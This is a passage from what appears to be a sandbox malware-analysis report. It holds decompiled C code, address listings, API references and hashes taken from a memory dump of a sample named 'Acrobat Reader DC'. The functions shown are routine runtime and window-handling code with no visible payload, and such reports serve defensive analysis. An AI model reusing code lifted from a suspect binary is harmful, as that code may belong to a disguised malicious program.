								_t78 = _t78 - _t95;
								_v8 = _v8 + _t95;
								goto L27;
								L31:
								__eflags = _t78;
							} while (_t78 != 0);
							goto L32;
						}
					}
					L3:
					 *((intOrPtr*)(E00417F77(_t100))) = 0x16;
					E00417F25();
					goto L4;
				}
			}





























                                  0x0041416a
                                  0x0041416f
                                  0x0041418e
                                  0x00000000
                                  0x00414177
                                  0x00414177
                                  0x0041417a
                                  0x0041417c
                                  0x00414195
                                  0x00414198
                                  0x0041419a
                                  0x00000000
                                  0x00000000
                                  0x0041419c
                                  0x004141a1
                                  0x004141a3
                                  0x004141a6
                                  0x00000000
                                  0x00000000
                                  0x004141a8
                                  0x004141ac
                                  0x004141b3
                                  0x004141b6
                                  0x004141b9
                                  0x004141bb
                                  0x004141c5
                                  0x004141bd
                                  0x004141c0
                                  0x004141c0
                                  0x004141cc
                                  0x004141ce
                                  0x00414293
                                  0x00000000
                                  0x004141d4
                                  0x004141d4
                                  0x004141d7
                                  0x004141d7
                                  0x004141dd
                                  0x0041420e
                                  0x0041420e
                                  0x00414211
                                  0x0041426a
                                  0x00414271
                                  0x00414274
                                  0x0041429f
                                  0x0041429f
                                  0x004142a1
                                  0x00000000
                                  0x004142a5
                                  0x00414276
                                  0x00414279
                                  0x0041427c
                                  0x0041427d
                                  0x00414280
                                  0x00414282
                                  0x00414284
                                  0x00414284
                                  0x00000000
                                  0x00414282
                                  0x00414213
                                  0x00414215
                                  0x00414222
                                  0x00414222
                                  0x00414226
                                  0x00414228
                                  0x0041422c
                                  0x0041422e
                                  0x00414231
                                  0x00414231
                                  0x00414231
                                  0x00414233
                                  0x00414234
                                  0x0041423e
                                  0x0041423f
                                  0x00414244
                                  0x00414247
                                  0x0041424a
                                  0x004142ad
                                  0x004142ad
                                  0x004142b1
                                  0x00000000
                                  0x0041424c
                                  0x0041424c
                                  0x0041424e
                                  0x00414250
                                  0x00414252
                                  0x00414252
                                  0x00414254
                                  0x00414257
                                  0x00414259
                                  0x0041425b
                                  0x00000000
                                  0x0041425d
                                  0x0041425d
                                  0x0041425d
                                  0x00000000
                                  0x0041425d
                                  0x0041425b
                                  0x0041424a
                                  0x00414218
                                  0x0041421e
                                  0x00414220
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00414220
                                  0x004141df
                                  0x004141e2
                                  0x004141e4
                                  0x00000000
                                  0x00000000
                                  0x004141e6
                                  0x0041429b
                                  0x0041429b
                                  0x0041429b
                                  0x00000000
                                  0x0041429b
                                  0x004141ec
                                  0x004141ee
                                  0x004141f0
                                  0x004141f2
                                  0x004141f2
                                  0x004141fa
                                  0x004141ff
                                  0x00414202
                                  0x00414204
                                  0x00414207
                                  0x00414209
                                  0x00000000
                                  0x0041428b
                                  0x0041428b
                                  0x0041428b
                                  0x00000000
                                  0x004141d4
                                  0x004141ce
                                  0x0041417e
                                  0x00414183
                                  0x00414189
                                  0x00000000
                                  0x00414189

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                  • String ID:
                                  • API String ID: 2782032738-0
                                  • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                  • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00441672(signed int __eax, signed int* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				struct tagRECT _v36;
				signed int _t38;
				intOrPtr _t40;
				signed int _t44;
				intOrPtr _t45;
				struct HWND__*** _t46;
				struct HWND__** _t47;
				intOrPtr* _t52;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t58;
				signed char _t60;
				intOrPtr _t62;
				intOrPtr _t68;
				signed int _t76;
				signed int _t80;
				void* _t86;
				void* _t96;

				_t38 = __eax | 0xffffffff;
				_v12 = _t38;
				_v16 = _t38;
				_t40 =  *0x4a8690; // 0x0
				ClientToScreen( *( *( *(_t40 +  *_a4 * 4))),  &_a8);
				_t54 =  *0x4a8694; // 0x0
				_t80 = 0;
				if(_t54 <= 0) {
					L24:
					_t44 = MessageBeep(0) | 0xffffffff;
					goto L25;
				} else {
					do {
						_t57 =  *0x4a8690; // 0x0
						_t68 =  *((intOrPtr*)( *((intOrPtr*)(_t57 + _t80 * 4))));
						_v20 = _t68;
						if(_t68 == 0) {
							goto L17;
						} else {
							_t76 = 3;
							_t86 =  *0x4a86b4 - _t76; // 0x2
							if(_t86 < 0) {
								goto L17;
							} else {
								while(1) {
									_t45 =  *0x4a86a4; // 0xa51ad0
									_t46 =  *(_t45 + _t76 * 4);
									if( *_t46 == 0) {
										goto L16;
									}
									L6:
									_t47 =  *_t46;
									if(_t47[1] !=  *((intOrPtr*)(_t68 + 4)) || (_t47[0x22] & 0x00000020) != 0) {
										goto L16;
									} else {
										_t60 = _t47[0x22];
										if(_t60 == 0xff || (_t60 & 0x000000ff) ==  *((intOrPtr*)(_t68 + 0x194))) {
											GetWindowRect( *_t47,  &_v36);
											_push(_a12);
											if(PtInRect( &_v36, _a8) == 0) {
												goto L16;
											} else {
												_t52 = _a4;
												if( *_t52 != _t80) {
													_v16 = _t80;
												}
												_t62 =  *0x4a86a4; // 0xa51ad0
												if(( *( *((intOrPtr*)( *((intOrPtr*)(_t62 + _t76 * 4)))) + 0x8a) & 0x00000008) != 0) {
													if( *_t52 != _t80) {
														 *_t52 = _v16;
													}
													return _t76;
												} else {
													if(_v12 < 0) {
														_v12 = _t76;
													}
													goto L16;
												}
											}
										} else {
											goto L16;
										}
									}
									goto L26;
									L16:
									_t76 = _t76 + 1;
									_t96 = _t76 -  *0x4a86b4; // 0x2
									if(_t96 <= 0) {
										_t68 = _v20;
										_t45 =  *0x4a86a4; // 0xa51ad0
										_t46 =  *(_t45 + _t76 * 4);
										if( *_t46 == 0) {
											goto L16;
										}
									} else {
										goto L17;
									}
									goto L26;
								}
							}
						}
						goto L26;
						L17:
						_t80 = _t80 + 1;
					} while (_t80 < _t54);
					_t44 = _v12;
					if(_t44 < 0) {
						goto L24;
					} else {
						_t58 = _v16;
						if(_t58 < 0) {
							L25:
							return _t44;
						} else {
							 *_a4 = _t58;
							return _t44;
						}
					}
				}
				L26:
			}
























                                  0x0044167e
                                  0x00441682
                                  0x00441685
                                  0x0044168d
                                  0x0044169a
                                  0x004416a0
                                  0x004416a6
                                  0x004416aa
                                  0x004417ab
                                  0x004417b3
                                  0x00000000
                                  0x004416b0
                                  0x004416b0
                                  0x004416b0
                                  0x004416b9
                                  0x004416bb
                                  0x004416c0
                                  0x00000000
                                  0x004416c6
                                  0x004416c6
                                  0x004416cb
                                  0x004416d1
                                  0x00000000
                                  0x004416d7
                                  0x004416e5
                                  0x004416e5
                                  0x004416ea
                                  0x004416f0
                                  0x00000000
                                  0x00000000
                                  0x004416f2
                                  0x004416f2
                                  0x004416fa
                                  0x00000000
                                  0x00441705
                                  0x00441705
                                  0x0044170e
                                  0x00441722
                                  0x0044172e
                                  0x0044173c
                                  0x00000000
                                  0x0044173e
                                  0x0044173e
                                  0x00441743
                                  0x00441745
                                  0x00441745
                                  0x00441748
                                  0x0044175a
                                  0x00441799
                                  0x0044179e
                                  0x0044179e
                                  0x004417a8
                                  0x0044175c
                                  0x00441760
                                  0x00441762
                                  0x00441762
                                  0x00000000
                                  0x00441760
                                  0x0044175a
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044170e
                                  0x00000000
                                  0x00441765
                                  0x00441765
                                  0x00441766
                                  0x0044176c
                                  0x004416e2
                                  0x004416e5
                                  0x004416ea
                                  0x004416f0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044176c
                                  0x004416e5
                                  0x004416d1
                                  0x00000000
                                  0x00441772
                                  0x00441772
                                  0x00441773
                                  0x0044177b
                                  0x00441780
                                  0x00000000
                                  0x00441782
                                  0x00441782
                                  0x00441787
                                  0x004417b6
                                  0x004417bc
                                  0x00441789
                                  0x0044178c
                                  0x00441794
                                  0x00441794
                                  0x00441787
                                  0x00441780
                                  0x00000000

                                  APIs
                                  • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                  • GetWindowRect.USER32 ref: 00441722
                                  • PtInRect.USER32(?,?,?), ref: 00441734
                                  • MessageBeep.USER32(00000000), ref: 004417AD
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Rect$BeepClientMessageScreenWindow
                                  • String ID:
                                  • API String ID: 1352109105-0
                                  • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                  • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                  • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042083F(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00411321( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004131B1( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0xbbdae900
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00417F77(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x1ac
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x1ac
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x1ac
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0xbbdae900
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                  0x00420849
                                  0x00420850
                                  0x00420867
                                  0x00000000
                                  0x00420857
                                  0x00420859
                                  0x00420873
                                  0x00420878
                                  0x0042087b
                                  0x0042087e
                                  0x004208a6
                                  0x004208ad
                                  0x004208af
                                  0x00420930
                                  0x00420942
                                  0x0042094b
                                  0x0042094d
                                  0x0042088d
                                  0x0042088d
                                  0x00420890
                                  0x00420892
                                  0x00420895
                                  0x00420895
                                  0x00420895
                                  0x00420895
                                  0x00000000
                                  0x0042089b
                                  0x0042090f
                                  0x0042090f
                                  0x00420914
                                  0x0042091a
                                  0x0042091d
                                  0x0042091f
                                  0x00420922
                                  0x00420922
                                  0x00420922
                                  0x00420922
                                  0x00000000
                                  0x00420926
                                  0x004208b1
                                  0x004208b4
                                  0x004208b4
                                  0x004208ba
                                  0x004208bd
                                  0x004208e4
                                  0x004208e7
                                  0x004208e7
                                  0x004208ed
                                  0x00000000
                                  0x00000000
                                  0x004208ef
                                  0x004208f2
                                  0x00000000
                                  0x00000000
                                  0x004208f4
                                  0x004208f4
                                  0x004208f4
                                  0x004208fa
                                  0x004208fd
                                  0x0042086c
                                  0x0042086c
                                  0x00420906
                                  0x00000000
                                  0x00420906
                                  0x004208bf
                                  0x004208c2
                                  0x00000000
                                  0x00000000
                                  0x004208c6
                                  0x004208d4
                                  0x004208d7
                                  0x004208dd
                                  0x004208df
                                  0x004208e2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004208e2
                                  0x00420880
                                  0x00420883
                                  0x00420885
                                  0x0042088a
                                  0x0042088a
                                  0x00000000
                                  0x0042085b
                                  0x0042085b
                                  0x00420860
                                  0x00420864
                                  0x00420864
                                  0x00000000
                                  0x00420860
                                  0x00420859

                                  APIs
                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                  • __isleadbyte_l.LIBCMT ref: 004208A6
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                  • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                  • String ID:
                                  • API String ID: 3058430110-0
                                  • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                  • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                  • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00442A83(intOrPtr _a4) {
				struct tagMSG _v32;
				void* __ebx;
				int _t28;
				intOrPtr _t41;

				_t41 = _a4;
				if( *0x4974e3 != 0 ||  *0x4a8668 != 0 &&  *(_t41 + 0xf8) == 0) {
					return 0;
				} else {
					_t28 = 1;
					if(PeekMessageW( &_v32, 0, 0, 0, 1) != 0) {
						while(_v32.message != 0x12) {
							if(E0040D150(0x4a8630,  &_v32) == 0) {
								if(E0040D170(0x4a8630,  &_v32) == 0) {
									TranslateMessage( &_v32);
									DispatchMessageW( &_v32);
								}
								_t28 = 1;
							}
							if(PeekMessageW( &_v32, 0, 0, 0, _t28) != 0) {
								continue;
							} else {
							}
							goto L14;
						}
						 *(_t41 + 0xfc) = _t28;
						 *(_t41 + 0xf8) = _t28;
					}
					L14:
					if( *0x4974e6 == _t28) {
						 *0x4974ec = 0;
						 *0x4974e6 = 0;
						 *(_t41 + 0xf8) = _t28;
					}
					if( *(_t41 + 0xf8) != _t28) {
						asm("sbb eax, eax");
						return  ~( *0x4974ec & 0x000000ff) & 0x0000000b;
					} else {
						return _t28;
					}
				}
			}







                                  0x00442a91
                                  0x00442a94
                                  0x00442aae
                                  0x00442ab1
                                  0x00442ab9
                                  0x00442acd
                                  0x00442ad3
                                  0x00442ae9
                                  0x00442afb
                                  0x00442b01
                                  0x00442b0b
                                  0x00442b0b
                                  0x00442b11
                                  0x00442b11
                                  0x00442b25
                                  0x00000000
                                  0x00000000
                                  0x00442b27
                                  0x00000000
                                  0x00442b25
                                  0x00442b29
                                  0x00442b2f
                                  0x00442b2f
                                  0x00442b35
                                  0x00442b3b
                                  0x00442b3d
                                  0x00442b44
                                  0x00442b4b
                                  0x00442b4b
                                  0x00442b57
                                  0x00442b6e
                                  0x00442b78
                                  0x00442b59
                                  0x00442b61
                                  0x00442b61
                                  0x00442b57

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchTranslate
                                  • String ID:
                                  • API String ID: 1795658109-0
                                  • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                  • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                  • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040E0C0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040E0C0(intOrPtr __esi, void* __fp0) {
				struct _NOTIFYICONDATAW _v940;
				struct HICON__* _t31;
				long _t33;
				long _t34;
				intOrPtr _t41;
				intOrPtr _t47;
				intOrPtr _t48;
				long _t51;
				intOrPtr _t53;
				void* _t64;

				_t64 = __fp0;
				_t53 = __esi;
				_v940.cbSize = 0x3a8;
				E00412F40( &(_v940.hWnd), 0, 0x3a4);
				if( *((intOrPtr*)(__esi + 0x198)) == 0) {
					_t48 =  *0x4a7f44; // 0xc006f
					 *((intOrPtr*)(__esi + 0x198)) = _t48;
				}
				if( *((intOrPtr*)(_t53 + 0x1a4)) == 0) {
					_t41 =  *0x4a7f48; // 0x502b1
					 *((intOrPtr*)(_t53 + 0x1a4)) = _t41;
					 *((intOrPtr*)(_t53 + 0x1a8)) = _t41;
				}
				if( *((intOrPtr*)(_t53 + 0x1b0)) == 0) {
					_t47 =  *0x4a7f4c; // 0x150137
					 *((intOrPtr*)(_t53 + 0x1b0)) = _t47;
				}
				_t10 = _t53 + 0x19c; // 0x0
				_t31 =  *_t10;
				_t11 = _t53 + 0x1a0; // 0x4a88b0
				_t51 = _t11;
				if(_t31 != 0) {
					if( *_t51 != 0) {
						DestroyIcon(_t31);
					}
				}
				 *(_t53 + 0x19c) = 0;
				 *_t51 = 0;
				_v940.hWnd =  *0x497518;
				_v940.uID = 1;
				_v940.uFlags = 3;
				_v940.uCallbackMessage = 0x401;
				_v940.hIcon = 0;
				if( *((intOrPtr*)(_t53 + 0x40)) != 0) {
					_t23 = _t53 + 0x3c; // 0xa51a40
					_t24 = _t53 + 0x10; // 0xffffffff
					_t33 = E004341E6(_t53,  *_t24,  *_t23, _t51);
					_v940.hWnd = _t33;
					 *(_t53 + 0x19c) = _t33;
					if( *((intOrPtr*)(_t53 + 0x40)) == 0) {
						goto L8;
					}
					if(_t33 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					L8:
					_t19 = _t53 + 0x198; // 0x0
					_t34 =  *_t19;
					_v940.hIcon = _t34;
					 *(_t53 + 0x19c) = _t34;
					L9:
					if( *0x4974ea == 1) {
						Shell_NotifyIconW(1,  &_v940);
					} else {
						Shell_NotifyIconW(0,  &_v940);
						 *0x4974ea = 1;
					}
					return E00401B80(_t53, _t64);
				}
			}













                                  0x0040e0c0
                                  0x0040e0c0
                                  0x0040e0da
                                  0x0040e0e2
                                  0x0040e0f1
                                  0x0040e0f3
                                  0x0040e0f9
                                  0x0040e0f9
                                  0x0040e106
                                  0x0040e108
                                  0x0040e10d
                                  0x0040e113
                                  0x0040e113
                                  0x0040e120
                                  0x0040e122
                                  0x0040e128
                                  0x0040e128
                                  0x0040e12e
                                  0x0040e12e
                                  0x0040e134
                                  0x0040e134
                                  0x0040e13c
                                  0x00427299
                                  0x004272a0
                                  0x004272a0
                                  0x00427299
                                  0x0040e148
                                  0x0040e152
                                  0x0040e15e
                                  0x0040e162
                                  0x0040e166
                                  0x0040e16e
                                  0x0040e176
                                  0x0040e17e
                                  0x004272ab
                                  0x004272ae
                                  0x004272b5
                                  0x004272be
                                  0x004272c2
                                  0x004272c8
                                  0x00000000
                                  0x00000000
                                  0x004272d0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e184
                                  0x0040e184
                                  0x0040e184
                                  0x0040e184
                                  0x0040e18a
                                  0x0040e18e
                                  0x0040e194
                                  0x0040e19a
                                  0x004272e1
                                  0x0040e1a0
                                  0x0040e1a7
                                  0x0040e1ad
                                  0x0040e1ad
                                  0x0040e1bf
                                  0x0040e1bf

                                  APIs
                                  • _memset.LIBCMT ref: 0040E0E2
                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell__memset
                                  • String ID:
                                  • API String ID: 928536360-0
                                  • Opcode ID: 245d695d0f2af4038a59a525fce9533f4fc2119324cc59ce2a552f74bd7fa797
                                  • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                  • Opcode Fuzzy Hash: 245d695d0f2af4038a59a525fce9533f4fc2119324cc59ce2a552f74bd7fa797
                                  • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E00434CC9(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr* _a8, short* _a12) {
				void* __edi;
				void* __esi;
				short _t25;
				WCHAR* _t33;
				int _t34;
				WCHAR* _t38;
				signed int _t52;
				signed int _t53;
				void* _t56;
				WCHAR* _t57;
				void* _t65;

				_t38 = _a4;
				 *_a8 = 4;
				_t25 = E00434C09(__ecx, __eflags, _t38);
				 *_a12 = _t25;
				_t65 = _t25 - 0xffff;
				if(_t65 != 0) {
					return _t25;
				} else {
					_push(_t56);
					_t52 = lstrlenW(_t38);
					_t4 = _t52 + 1; // 0x1
					_push( ~(0 | _t65 > 0x00000000) | _t4 * 0x00000002);
					_t57 = E004115D7(_t52, _t56, _t65);
					lstrcpyW(_t57, _t38);
					_t57[_t52] = 0;
					_t53 = 0;
					if( *_t57 == 0) {
						L9:
						_push(_t57);
						return E004111DC();
					}
					_t33 = _t57;
					while( *_t33 != 0x3a) {
						_t53 = _t53 + 1;
						_t33 =  &(_t57[_t53]);
						if(_t57[_t53] != 0) {
							continue;
						}
						_push(_t57);
						return E004111DC();
						goto L11;
					}
					_t18 = _t53 * 2; // 0x2
					_t45 = _t57 + _t18 + 2;
					_t34 = lstrcmpiW(_t57 + _t18 + 2, L"cdecl");
					__eflags = _t34;
					if(_t34 == 0) {
						 *_a8 = 1;
					}
					__eflags = 0;
					_t57[_t53] = 0;
					 *_a12 = E00434C09(_t45, 0, _t57);
					goto L9;
				}
				L11:
			}














                                  0x00434cd0
                                  0x00434cd4
                                  0x00434cda
                                  0x00434ce7
                                  0x00434cea
                                  0x00434ced
                                  0x00434d96
                                  0x00434cf3
                                  0x00434cf3
                                  0x00434cfc
                                  0x00434d00
                                  0x00434d11
                                  0x00434d1a
                                  0x00434d1e
                                  0x00434d26
                                  0x00434d2a
                                  0x00434d2f
                                  0x00434d89
                                  0x00434d89
                                  0x00000000
                                  0x00434d93
                                  0x00434d31
                                  0x00434d39
                                  0x00434d3f
                                  0x00434d45
                                  0x00434d48
                                  0x00000000
                                  0x00000000
                                  0x00434d4a
                                  0x00434d57
                                  0x00000000
